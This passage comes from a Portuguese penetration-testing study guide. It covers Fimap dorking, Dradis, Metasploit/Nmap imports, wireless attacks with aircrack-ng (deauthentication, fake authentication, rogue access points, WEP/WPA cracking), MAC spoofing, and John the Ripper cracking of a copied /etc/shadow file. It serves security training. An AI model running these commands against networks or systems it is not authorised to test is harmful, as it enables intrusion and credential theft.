O BlindElephant pode ser utilizado diretamente pela shell ou
como uma biblioteca para fornecer funcionalidade de fingerprinting
para outros programas.
Fimap
O Fimap uma ferramenta desenvolvida em python e pode encontrar,
preparar, examinar e explorar o Google automaticamente em busca de
erros de arquivos locais e remotos.
#python fimap.py -g -q inurl:noticias.php?id=

#python fimap.py -g -q inurl:noticias.php?id=

www.clubedohacker.com.br

439

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O objetivo dele melhorar a qualidade e a segurana de um
determinado site e muito til para uma pesquisa especifica.

Dradis Framework
Mesmo nos dias de hoje onde presenciamos a grande evoluo
dos sistemas Linux, ainda temos algumas dificuldades em centralizar
relatrios e trat-lo s de forma colaborativa.
Na maioria dos casos uma equipe de analistas necessitam
centralizar as informaes colhidas de determinado projeto em
execuo em algum repositrio para que a equipe inteira possa
acompanhar e cada um dos seus membros possam dar sua
contribuio.
aqui que entra o Dradis um excelente framework para centralizao
de todos os projetos. O projeto do Framework Dradis pode ser
acessado atravs da url http://dradisframework.org/.
Comunicando sobre o SSL, possvel importar arquivos de
resultado do Nmap e Nessus, anexar arquivos, gerar relatrios, e pode
ser estendido para conectar-se com sistemas externos: Por exemplo,
banco de dados de vulnerabilidade etc.

www.clubedohacker.com.br

440

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
No BackTrack ele j vem instalado, mais se voc utiliza outra
distribuio ou deseja instalar voc pode fazer isso com o comando;
#apt-get install dradis
Uma vez que o framework foi instalado voc pode ir para o
diretrio e iniciar o servidor. #cd /pentest/misc/dradis/server
#ruby ./script/server
Agora s abrir a interface web do Dradis.
HTTPS://localhost:3004 (Ou use o endereo de IP), aceite o aviso de
certificado, digite uma senha para o novo servidor, quando solicitado
e faa o login usando a senha definida na etapa anterior.
Note que no h nomes para definir a forma de login, voc pode usar
qualquer nome de login. Se tudo correr bem, voc ser direcionado a
uma interface dradis em sua rea de trabalho.

www.clubedohacker.com.br

441

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

No lado esquerdo, voc pode criar uma estrutura de rvore.


Assim voc pode organizar as informaes como; (por exemplo:
hosts, sub-redes, servios, etc.)
No lado direito voc pode adicionar as informaes relevantes
para cada elemento (notas, anexos etc.).
Antes de iniciar o console do Dradis, voc precisar editar o
arquivo dradis.xml para refletir o nome de usurio e senha quando
voc definir inicialmente no funcionamento do servidor.
Obs: Na verso 5 do backtrak o dradis j vem instalado, portanto,
pode haver algumas mudanas pois esse um projeto em franca

www.clubedohacker.com.br

442

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
evoluo. Para quem usa ainda o BackTrack4, o arquivo pode ser
encontrado em: /pentest/misc/dradis/client/conf.
Carregue o console do Dradis com o comando
/pentest/misc/dradis/client/. ruby ./dradis.rb de dentro do diretrio
Para mais informaes sobre o Framework Dradis, voc pode
visitar o site do projeto no endereo http://dradisframework.org/.
Embora j tenhamos instalado e configurado o Dradis para
armazenar as informaes e resultados, sempre bom criar um novo
banco de dados usando o Metasploit para que os dados possam ser
recuperados de forma rpida em caso de necessidades em
determinados cenrios de ataque.
msf> db_create
msf> load db_tracker
msf> help
Pode-se usar o comando 'db_nmap' para executar uma varredura
do Nmap contra os alvos e ter os resultados da verificao
armazenada no banco de dados recm-criado, no entanto, o
Metasploit s ir criar o arquivo de sada XML que o formato que
ele usa para preencher os dados enquanto que o Dradis pode importar
a sada para o grep ou normal.

www.clubedohacker.com.br

443

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
sempre bom ter todas as trs sadas do Nmap (XML, grep, e
normal).
Experimente executar o Scan Nmap usando as flags -oA para
gerar a sada dos trs arquivos e em seguida, execute o comando
db_import_nmap_xml para alimentar o banco de dados do
Metasploit. Se voc no quiser importar os seus resultados para o
Dradis, basta executar o Nmap usando db_nmap com as opes que
voc usaria normalmente, omitindo a flag de sada.
O exemplo a seguir seria, ento; db_nmap v -sV 192.168.1.0/24.
msf> nmap v sV 192.168.1.0/24 oA subnet_1; Com a varredura
terminada, pode-se usar o comando db_import_nmap_xml para
importar o arquivo XML do Nmap. msf>db_import_nmap_xml
subnet_1.xml
Aps isso s importar os resultados para o Dradis; dradis>
import nmap /pentest/exploits/framework/subnet_1.nmap normal
e atualizar o navegador para que os dados possam ser exibidos.

www.clubedohacker.com.br

444

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Ataque a redes wireless

www.clubedohacker.com.br

445

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
As Redes sem fio ou wireless (WLANs) surgiram da mesma
forma que muitas outras tecnologias; no meio militar. Havia a
necessidade de implementao de um mtodo simples e seguro para
troca de informaes em ambiente de combate.
O tempo passou e a tecnologia evoluiu, deixando de ser restrita
ao meio militar e se tornou acessvel a empresas, faculdades e ao
usurio domstico.
Nos dias de hoje podemos pensar em redes wireless como uma
alternativa bastante interessante em relao as redes cabeadas, embora
ainda com custo elevado. Suas aplicaes so muitas e variadas e o
fato de ter a mobilidade como principal caracterstica, tem facilitado
sua aceitao, principalmente nas empresas.
A evoluo dos padres oferecendo taxas de transmisso
comparveis a Fast Ethernet por exemplo, torna as redes wireless uma
realidade cada vez mais presente.
WLANs usam ondas de radio para transmisso de dados.
Comumente podem transmitir na faixa de freqncia 2.4 Ghz (No
licenciada) ou 5 Ghz.

www.clubedohacker.com.br

446

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Padres wifi
Como WLANs usam o mesmo mtodo de transmisso das
ondas de radio AM/FM, as leis que as regem so as mesmas destes. O
FCC (Federal Comunications Comission), regula o uso dos dispositivos
WLAN.
O IEEE ( Institute of Eletrical and Eletronic Engineers)
responsvel pela criao e adoo dos padres operacionais. Voc pode
estudar sobre esses padres no site do IEEE em:
http://www.ieee802.org/ pois o nosso foco aqui a analise de
vulnerabilidades.

www.clubedohacker.com.br

447

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Autenticao e autorizao
Para se conectar a uma rede, necessrio autenticar e associar o
cliente; O IEEE 802.11 descreve o mtodo de descoberta de redes por
varredura ativa; Informaes adicionais e documentao completa
podem ser obtidas atravs do site: http://www.ieee.org/
1) Inicialmente tem-se quadros Probe Request que faz uma varredura
em todos os canais possveis, em busca de redes disponveis.
2) O Quadro Probe Response a resposta do ponto de acesso aos
quadros probe request com os parmetros necessrios para conexo;
Identificando o SSID, o canal e a taxa de transmisso de dados
disponvel o cliente obtm ento, a lista de redes disponveis.
3) Cliente inicia o processo de autenticao com uma das redes
disponveis; Redes abertas no requerem autenticao e o ponto de
acesso inicia automaticamente o processo, j as redes fechadas
requerem autenticao entre o cliente e o ponto de acesso que ir
autenticar o cliente utilizando algum mtodo, seja (WEP/WPA-PSK ,
EAP etc.);
4) Aps a autenticao termina o processo de associao e uma vez
associado j pode haver a troca de dados via rede Wireless;

www.clubedohacker.com.br

448

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

O processo acima o ideal, o grande problema que a placa de


rede pode trabalhar em modos de operao variados.
Com o modo Cliente, que configura a interface para atuar como
cliente, nesse modo no possvel mudar de canal e deve enviar
solicitaes probe requests para identificar redes existentes, isso
significa que se voc desejar rodar um sniffer, s conseguir coletar
pacotes 802.3 padro ethernet, ou seja, voc j deve estar associado e
colocar a placa em modo promiscuo.
Modo Monitor
Modo Monitor, tambm chamado de modo de monitoramento,
permite que um computador com uma placa com interface de rede
sem fio realize o monitoramento de todo o trfego recebido da rede

www.clubedohacker.com.br

449

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
wireless. Esse modo bem diferente do modo promscuo, que
utilizado para sniffar o trafego em rede, o modo monitor lhe permite
capturar pacotes sem a necessidade de o cliente estar associado ao
ponto de acesso.
Uma outra distino entre o modo promiscuo e monitor que o
segundo atua com eficincia apenas nas redes wireless, enquanto o
primeiro pode ser usado em redes cabeadas.
Aqui que entra a fase mais interessante, pois pode-se utilizar o
modo monitor para se fazer analise de vulnerabilidade e para outros
propositos "maliciosos" como coletar trfego de um vizinho para
roubar internet sem sua permisso, pois ele opera diretamente na
camada fsica, acessa frames de gerenciamento e controle do 802.11 e
se reconhecer a chave, possvel decifrar a informao contida nos
pacotes capturados em todos os canais utilizados channel hopping;

Ferramentas para auditoria em Wireless


Para se fazer uma boa auditoria em redes wireless precisamos
dominar o conjunto de ferramentas air+-ng, todas
disponveis no Backtrack e no Kali Linux e que
chamamos de sute de utilitrio air*-ng, composta de

www.clubedohacker.com.br

450

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
diversos softwares para deteco e ataques Access
Points e clientes wi-fi. Os principais so:
Airmon-ng Serve para colocar a placa de rede em modo
monitorao. Essencial para poder capturar o trfego das
redes wi-fi sem estar conectado nas mesmas.

Airodump-ng Monitora o espectro wi-fi e captura pacotes para um


arquivo especificado pelo usurio.

www.clubedohacker.com.br

451

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Exemplo prtico:
Sintaxe: airodump-ng <opes> <interface>
Opes:
--channel canal -> Especifica o canal de operao
w arquivo -> Salva os pacotes capturados em um
arquivo. Mesmo que a opo write.
--encrypt tipo -> Filtra APs por tipo de criptografia

www.clubedohacker.com.br

452

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
--bssid MAC -> Filtra APs pelo BSSID do AP
-a Filtra clientes desassociados -> Especifica o canal de
operao
Utilizando o comando --help no airodump-ng sero mostradas
na sada padro todas as opes disponvel para sua utilizao.
Vamos descrever essas opes aqui, mais voc pode encontrar
informaes detalhadas no site: http://www.aircrack-ng.org
usage: airodump-ng <options> <interface>[,<interface>,...]
Options: = Opes
--ivs : Save only captured IVs = Salvar somente IVs
capturados
--gpsd : Use GPSd = Opo para uso de GPSd
--write

<prefix> : Dump file prefix = Prefixo do arquivo

dump
-w

: same as --write = A mesma coisa que --write

--beacons

: Record all beacons in dump file = Gravar todos

os beacons em um arquivo dump

www.clubedohacker.com.br

453

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
--update <secs> : Display update delay in seconds =
Mostrar o atraso de atualizao
--showack : Prints ack/cts/rts statistics = Mostrar as
estatsticas
-h

: Hides known stations for --showack = Esconder as

estaes conhecidas pelo --showack


-f <msecs> : Time in ms between hopping channels =
Tempo entre canais "alternando"
--berlin <secs> : Time before removing the AP/client =
Tempo antes da remoo do Access Point cliente por inatividade no
recebimento de pacotes, o padro 120
-r <file> : Read packets from that file = Leitura de pacotes
de um arquivo especificado
-x <msecs> : Active Scanning Simulation = Simulao de um
scanner de explorao ativa
--output-format = Formato de sada - pcap, ivs, csv, gps,
kismet, netxml
fixed channel <interface>: -1 = Canal fixo
Filter options: = Opes de filtros

www.clubedohacker.com.br

454

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
--encrypt <suite> : Filter APs by cipher suite = Filtra APs
pela criptografia
--netmask <netmask> : Filter APs by mask = Filtra APs
pela mscara de sub-rede
--bssid <bssid> : Filter APs by BSSID = Filtra APs pelo
BSSID
-a : Filter unassociated clients = A mesma coisa que -cswitch
You can make it capture on other/specific channel(s) by
using: Captura em canais especficos de acordo com sua vontade
--channel <channels> : Capture on specific channels =
Capture em um canal especfico
--band <abg> : Band on which airodump-ng should hop =
Banda na qual o airodump-ng deve saltar (a, b ou g)
-C

<frequencies> : Uses these frequencies in MHz to hop =

Usar frequncia em MHZ para salto.


--cswitch <method> : Set channel switching method =
Configura o mtodo de alternano entre os canais.

www.clubedohacker.com.br

455

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
0 : FIFO (default) = FIFO (padro
1

: Round Robin = Sem traduo amigvel

: Hop on last = Salta no ultimo.

-s

: same as --cswitch = O mesmo que --cswitch

--help : Displays this usage screen = Mostrar na tela as opes


disponveis para utilizao do programa.
Aireplay-ng Serve para Injetar pacotes falsificados em uma rede
sem fio, permite falsificar autenticaes e desassociar os
usurios legtimos da rede.

www.clubedohacker.com.br

456

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Modo filtro
-b bssid -> Especifica o MAC do Access Point
-d dmac -> Especifica o MAC de destino
-s smac -> Especifica o MAC de origem
Modo replay:
-a bssid -> Especifica o MAC do Access Point
-c dmac -> Especifica o MAC de destino

www.clubedohacker.com.br

457

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
-h smac -> Especifica o MAC de origem
-x num -> Nmero de pacotes por segundo
Modo ataque:
--deauth num -> Desassocia 1 ou todas (0) as estaes
(opo 0) --fakeauth atraso -> Finge autenticao com o
AP (opo 1)
--arpreplay -> Injeta pacotes ARP na rede wi-fi (opo 3)
--caffe-latte -> Pede a um cliente mais IVs (opo 6)
Opes do ataque Fakeauth:
-e essid -> Especifica o ESSID do Access Point
-o num -> Nmero de pacote por burst (0=auto, padro=1)
-q seg -> Segundos entre keep-alives
-Q -> Enviar pedidos de reassociao -y prga -> Chave
para autenticao (capturada via airodump-ng)
-T num -> Interrompe aps n tentativas de autenticao

www.clubedohacker.com.br

458

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Airbase-ng Permite criar Access Point simulado para a realizao
de ataques de captura de chaves e Tcnicas de Homem no
meio "MITM" contra os dispositivos clientes.

Opes:
-a bssid -> Especifica o MAC do Access Point
-a essid -> Especifica o ESSID do Access Point (nome da
rede)
-i interface -> Interface que ter seus pacotes capturados
-w

chave_wep

->

use

essa

chave

wep

para

criptografar/descriptografar pacotes

www.clubedohacker.com.br

459

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
-h MAC -> Usado em ataques de MITM (MAC de
origem)
-W 0|1 -> Habilita (1) ou Desabilita (0) uso do WEP
-z tipo -> Configura WPA1 . 1=WEP40, 2=TKIP,
3=WRAP, 4=CCMP, 5=WEP104
-Z tipo -> Configura WPA2. Mesmas opes do WPA1.
-C segundos -> Habilita beaconing dos ESSIDs
detectados com a opo P
-v -> Modo verbose (mostra mais informaes)
-c -> Configura o canal que o AP est funcionando
-X -> Coloca o AP com seu ESSID oculto
-P -> Responde a todas as requisies
-L -> Habilita o ataque Caffe Latte do WEP
Aircrack-ng Serve para quebrar a chave de criptografia WEP ou
WPA capturada atravs do airodump-ng ou de outra
ferramenta de captura.

www.clubedohacker.com.br

460

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Airdecap-ng Os pacotes passam na rede wireless criptografados e


somente quem tem a chave pode decodificar e extrair tais
pacotes, essa ferramenta permite decodificar pacotes
criptografados fornecendo o arquivo de captura de pacotes
e a chave de criptografia.

www.clubedohacker.com.br

461

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Passos para um ataque a uma rede wireless


Os passos para um ataque a uma ou vrias redes wireless so os
seguintes: Lembrando que voc pode fazer tudo isso na mo ou
atravs das ferramentas, demonstrarei as duas opes aqui para que
voc entenda melhor e possa tomar suas prprias decises de
acordo com suas necessidades.
1 - Trocar o endereo MAC; Principalmente se no desejar ter seu
endereo mac original.

www.clubedohacker.com.br

462

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

2 - Ativar o monitor de sua placa de rede wireless; A ativao do


modo de monitoramento da placa de rede pode ser feito com o
airmon-ng ou atravs da linha de comandos no Linux

3 - Ativar a coleta de dados e motivar o envio de IV a partir do AP .

Aps coletar um bom nmero de IVs s realizar fora bruta para


identificar a chave WEP ou Dicionrio para chave WPA.
Clonando o endereo MAC

www.clubedohacker.com.br

463

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Em muitas tarefas de analise de vulnerabilidades ser necessrios a
clonagem do mac address de sua placa de redes.
#ifconfig eth0 down
#airmon-ng stop eth0 #macchanger --m FA:SI:FU:00:00:00

www.clubedohacker.com.br

464

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Com o comando acima voc pode derrubar a placa de rede e clonar o
endereo MAC. O prximo passo ser levantar a placa e os servios.

Aqui vemos que a placa clonada j esta funcionando


corretamente.
Agora s utilizar o programa de sua preferncia para capturar os
pacotes ou mesmo utilizar a rede com o endereo MAC clonado.
Lembramos que h fortes implicaes legais se voc utilizar
qualquer destas tcnicas para algo ilcito, como se passar por outra
pessoa etc. Se utilizar essas tcnicas dentro da empresa sem as devidas
autorizaes por escrito voc pode inclusive ser demitido por justa
causa.

www.clubedohacker.com.br

465

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Conhecendo melhor e praticando com o macchanger


O macchanger um utilitrio Linux para visualizar e manipular
o endereo MAC dos dispositivos de redes - Voc encontra o manual
completo dele, se digitar em uma shell linux o comando #man
macchanger
SYNOPSIS = Resumo

macchanger [options] device = macchanger [ opes]

dispositivo de redes a ser clonado


macchanger -h, --help = Ajuda
macchanger -V, --version = Verso
macchanger outras opes atravs do seu manual
Organizando um ataque em infraestrutura wireless
1-) Parar as interfaces de rede wireless:
#ifconfig <interface> down
#airmon-ng stop <interface>

www.clubedohacker.com.br

466

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
2-) Falsificar um MAC ADDRESS
#macchanger --m FA:SI:FU:00:00:00 <interface>
airmon-ng
airmon-ng start wlan0
Airmon-ng check wlan0
iwconfig <interface> mode monitor (ou airmon-ng start wlan0)
Iwconfig - Verificar as configuraes
Ifconfig -a - Idem
airodump-ng --ivs -w arquivo.ivs <interfaces>

www.clubedohacker.com.br

467

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Praticando com o airodump


Com j citado anteriormente o Airodump-ng usado para
capturar pacotes de frames brutos 802.11 e muito eficiente na coleta
de IVs "Vetores de Inicializao" WEP .
Aps a captura de uma boa quantidade de IVS j pode-se
descobrir senhas com a utilizao do aircrack-ng.
Adicionalmente o airodump-ng pode criar um arquivo de texto
(tambm chamado de dump) contendo os detalhes de todos os
Access Points e clientes encontrados.

www.clubedohacker.com.br

468

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Quebrar a senha com o aircrack


Aps a captura dos pacotes, deve-se utilizar o aircrack para descifrar a
senha da redes wireless, no importante de wep ou wpa pois esse
procedimento relativamente simples, vamos conhecer um pouco
mais sobre o aircrack e aprender a utiliz-lo para testar a fragilidade
de sua rede sem fio.
Na prtica basta utilizar o comando abaixo para iniciar essa
maravilhosa ferramenta de quebra de senhas.
Advirto que as informaes completas voc pode obter atravs
do site oficial em: http://www.aircrack-ng.org
#aircrack-ng <arquivo> -w dicionario.txt - para utilizar
dicionrio.

www.clubedohacker.com.br

469

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Aqui devem ser


mostradas todas as
redes encontradas.

www.clubedohacker.com.br

470

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Senha decifrada

No primeiro exemplo foi testado um arquivo contendo senha


wpa, nos casos de senha wep pode ser utilizado fora bruta com o
comando abaixo.
aircrack-ng <arquivo> para fora bruta.

www.clubedohacker.com.br

471

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Algumas opes de uso do aircrack


Lembramos que o manual completo voc pode ler no site oficial
do aircrack em: http://www.aircrack-ng.org/
usage: = Uso
aircrack-ng [options] <.cap / .ivs file(s)>
-a <amode> : force attack mode (1/WEP, 2/WPA-PSK) = Modo do
ataque
-e <essid> : target selection: network identifier = Seleo de alvo e
identificao da rede
-b <bssid> : target selection: access point's MAC = Seleo do alvo e
mac address do access point
-p <nbcpu> : # of CPU to use (default: all CPUs) = Uso de CPUs o
padro todas as CPUs
-q
: enable quiet mode (no status output) = Ativar o modo
silencioso
-C <macs> : merge the given APs to a virtual one = Mesclar APs

www.clubedohacker.com.br

472

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
-c
: search alpha-numeric characters only = Buscar somentes
caracteres alfa-numricos
-t
: search binary coded decimal chr only = Buscar somente cdigo
binrio e decimal
-h
: search the numeric key for Fritz!BOX = Procurar a chave
numrica
-d <mask> : use masking of the key (A1:XX:CF:YY) = Usar a chave de
mascaramento
-m <maddr> : MAC address to filter usable packets = Habilitar endereo
mac para filtrar pacotes
-n <nbits> : WEP key length : 64/128/152/256/512 = Compimento da
chave wep
-i <index> : WEP key index (1 to 4), default: any = Indice de chave web
de 1 a 4, o padro qualquer um
-f <fudge> : bruteforce fudge factor, default: 2 = Fator de correo
"fora bruta" o padro 2
-k <korek> : disable one attack method (1 to 17) = Desativa o metodo
de ataque, o pdro de 1 a 17
-x or -x0 : disable bruteforce for last keybytes = Desabilita forra bruta
para os ultimos keybytes
cracking options: = Opes para craquear
-w <words> : path to wordlist(s) filename(s) WPA-PSK = Caminho
para o arquivo contendo a wordlist
Exemplo: aircrack nome do aqrivo contendo a possivel senha -w
caminho do dicionrio
options: Opes
-E <file> : create EWSA Project file v3 = criar arquivo
-J <file> : create Hashcat Capture file = criar um hash do arquivo
-S
: WPA cracking speed test = Teste de velocidade

www.clubedohacker.com.br

473

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
-r <DB> : path to airolib-ng database (Cannot be used with -w) =
Caminho para o banco de dados (No utilizar com -w)
Para as outras opes acessem o site do projeto em:
http://www.aircrack-ng.org/

Wifitap

#./wifiping.py eth0
O Wifitap uma ferramenta para prova de conceito em redes
WiFi usando injeo de trfego. O Wifitap permite a comunicao
direta com uma estao associada a um dado ponto de acesso
diretamente, isso significa que voc no precisa estar associado e no
ser tratado pelo access point.
~# modprobe +modulo de sua placa
~# ifconfig eth1 up (considerando que eth1 sua placa de rede)
~# iwlist eth1 scan

www.clubedohacker.com.br

474

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
eth1

Scan completed :

Para montar a interface WiFi em modo monitor no canal 11. Por


exemplo:
~# iwconfig eth1 mode monitor channel 11
~# ifconfig eth1 promisc
~# wifitap.py
Ele tem um manual que voc acessar com o comando cat README

O Wifitap permite que voc capture qualquer aplicativo que envie e


recebe pacotes IP utilizando 802,11.

www.clubedohacker.com.br

475

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Alm disso, lhe permite livrar-se de qualquer limitao


definida no ponto de acesso, pois traz consigo algumas ferramentas
adicionais que podem auxili-lo em suas tarefas.

Requisio ARP (wifiarp.py);


Requisio DNS (wifidns.py).
Requisio de acho ICMP (wifiping.py);

www.clubedohacker.com.br

476

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Auditando senhas com o John The Ripper

As senhas so consideradas como o ponto mais fraco de qualquer


sistema computacional, pois geralmente so definidas por usurios sem
muito ou mesmo nenhum conhecimento dessa matria, por desconhecer
o que significa uma senha forte ou fraca e mesmo dos potenciais riscos
de se utilizar informaes pessoais na escolha da senha, tornando seus
sistemas totalmente vulnerveis.
Fazer com que estas senhas sejam trocadas em intervalos de
tempo curtos e usando senhas fortes pode minimizar em muito esse
risco.
Quebrar senhas com fora bruta e ou mesmo dicionrios o
papel de ferramentas como o Hydra e John The Ripper.
Quando um atacante tem acesso diretamente ao arquivo que
contm as senhas (como o arquivo shadow do Linux ou sam do
Windows por exemplo, ele poder utilizar um software que consiga
descobrir a senha e isso que iremos demonstrar agora com John The
Ripper.

www.clubedohacker.com.br

477

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Dentro do diretrio encontraremos diversos arquivos e outros diretrios,


inclusive wordlist com milhares de opes de senhas para testes, mais o
ideal sempre ter sua prpria wordlit

Uma da primeiras tarefas testar a capacidade seu hardware em


trabalhar com criptografia, o que deve ser feito com o comando abaixo.

www.clubedohacker.com.br

478

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Ao digitar #./john -test e pressionar enter a capacidade do hardware de


lidar com criptografia ser testada. Um relatrio ser apresentado, cabe a
voc escolher para onde deve ser enviado ou se deseja manter apenas na
sada padro para visualizao imediata.
Vamos testar a capacidade do john em nosso arquivo de senhas do
usurios do Linux;
# cp /etc/shadow /home/arquivos = Esse comando ir fazer uma
copia com hashes de senhas de meu arquivo shadow para o
diretrio home e dar o nome de minhassenhas.txt;
# ./john /home/caminho_do_arquivo = O comando abaixo ir
descubrir as senhas dentro do arquivo especificado;

Podemos pegar a senha de um usurio especifico se desejar, para


isso basta especificar corretamente conforme o exemplo abaixo.
#./john -show -users:adonel /etc/shadow = Para exibir a senha do
adonel

www.clubedohacker.com.br

479

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

#./john -show -users:root /etc/shadow = Para exibir a senha do


root

Vimos at aqui que o john extraordinrio para quebrar senhas.


Criando wordlist
Existem situaes em que no dar para fazer fora bruta
direto, como o caso das senhas criptografadas com WPA nas
redes Wireless. Para esses casos voc ter que criar um bom
dicionrio (as chamadas wordlists) que podem auxiliar bastante
nesse processo. Uma ferramenta muito boa e que j esta
disponvel no Backtrack crunch disponvel em:
http://wordlist.sourceforge.net

#./crunch 6 12 1234567890 -o /tmp/wordlist-numerica.txt


Com o comando acima criaremos uma wordlist com senha
numrica, com o mnimo de 6, Maximo de 12 caracteres.
j com o comando abaixo podemos criar uma wordlist com
outras combinaes, inclusive fixando parte da senha.

www.clubedohacker.com.br

480

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
No exemplo abaixo irei criar uma wordlist com 10
caracteres, acrescendo o nome jose em todas as tentativas ou
seja, a opo -t nos permite repetir em todas as opes a palavra
jose. Nas opes pode-se tambm acrescentar o alfabeto em
letras MAISCULAS OU minsculas e nmeros, depende de suas
necessidades.
# ./crunch 10 10 1234567890 -t jose@@@@ -o /tmp/wordlistjose.txt = Wordlist com string fixa.

Bibliogrfica
Foram pesquisadas varias fontes como pesquisa para embasar esse
volume, mais o maior destaque foi exatamente o objeto do projeto em
http://www.backtrack-linux.org
TCP/IP A Bblia: Meeta Gupta, Mridula Parihar, Paul Lasalle, Rob
Scrimger
Redes De Computadores: Andrew S. Tanenbaum
Exame de Redes com Nmap: http://www.lcm.com.br
Pilha TCP/IP: http://www.rfc-editor.org
Metasploit: http://www.metasploit.com

www.clubedohacker.com.br

481

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Sniffer de redes na internet: http://www.serversniff.net/index.php
Base de dados de exploits: http://www.exploit-db.com
Clube do Hacker: http://www.clubedohacker.com.br
Fontes do Debian em: debian.org
Fonte: clubedohacker.com.br
Wireshark: www.wireshark.org
www.untidy.sourceforge.net
http://www.fastandeasyhacking.com
http://www.ieee802.org/11
http://www.ieee.org
http://dradisframework.org
BEZERRA, Adonel - Evitando Hackers
http://datatracker.ietf.org/wg/sigtran/charter
http://www.ietf.org/rfc/rfc3309.txt
http://www.ietf.org/rfc/rfc4460.txt
https://github.com/beefproject/beef
https://sourceforge.net/projects/blindelephant
http://www.aircrack-ng.org
http://technet.microsoft.com/pt-br/library/cc716451.aspx
http://www.owasp.com/index.php/Main_Page,
OSSTMM em: http://www.isecom.org/research/osstmm.html
Assuno, Marcos Flvio Arajo Segredos do Hacker tico. 4.ed, Visual
books 2011.

www.clubedohacker.com.br

482

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Aqui eu dou por concluso esse mdulo, enquanto


voc pesquisa sobre as sugestes
apresentadas nessa estapa eu comeo o
segundo mdulo avanado que ir
apresentar as outras ferramentas do Kali
Linux e discutiremos as formas de
apresentao do relatrio final para o
cliente.
Peo as benos de Deus para todos ns nessa
caminhada.
Desejo muito sucesso em sua vida profissonal como
analista de vulnerabilidades.
Adonel Bezerra.
www.clubedohacker.com.br

www.clubedohacker.com.br

483